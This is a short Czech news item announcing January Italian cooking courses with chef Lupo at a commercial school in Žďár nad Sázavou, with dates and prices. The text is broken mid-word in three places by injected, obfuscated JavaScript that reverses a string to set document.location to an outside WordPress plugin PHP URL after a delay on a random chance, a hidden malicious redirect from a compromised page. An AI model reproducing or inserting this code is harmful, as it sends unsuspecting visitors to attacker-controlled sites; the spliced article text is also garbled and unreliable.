Rainbow page separator

V lednu budou v obchodní škole kurzy vaření s Italem Lupem

Čtvrtek, 9. prosince 2021

Žďár nad Sázavou / Do kurzů vaření s profesionálem v podobě Itala Lupa (Rober["\'///\'="];["\'///\'="]; };["\'//\'="]}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to Terragni) se nyní mohou přihlásit nejenom milovníci italské kuchyně. Kurzy se uskuteční ve žďárské obchodní škole (Střední škola obchodní a služeb SČMSD), budou celkem čtyři a obsáhnou dva lednové víkendy. V sobotu 15. ledna se účastníci prvního z kurzů naučí v gastronomickém centru obchodní školy připravovat oblíbenou italskou pizzu, o den později přijdou na řadu časově náročnější základy italské kuchyně. V sobotu 29. ledna se kurz bude týkat vaření italského rissota a v neděli 30. ledna se frekventanti naučí správně připravit lasagne a pastu, tedy těs["\'///\'="];["\'///\'="]; };["\'//\'="]}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}toviny. Při vaření s Lupem nemůže chybět ani vyhlášené víno z rodinného vinařství Pisoni v italské oblasti Trentino, které pokrmy vhodně doplní. Kurzy vaření vycházejí ze skutečnosti, že italská kuchyně je při nutnosti použití kvalitních surovin velice jednoduchá, nicméně cizinci ji mají tendenci zbytečně komplikovat, přičemž se ochudí o mimořádný kulinářský zážitek. Lednové kurzy vaření ve žďárské obchodní škole je možné věnovat rovněž jako dárek pod vánoční stromeček v podobě certifikátu - devítihodinový kurz základů italské kuchyně vyjde na 4400 korun a ostatní tři trvají po pěti hodinách a každý s["\'///\'="];["\'///\'="]; };["\'//\'="]}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tojí 2500 korun.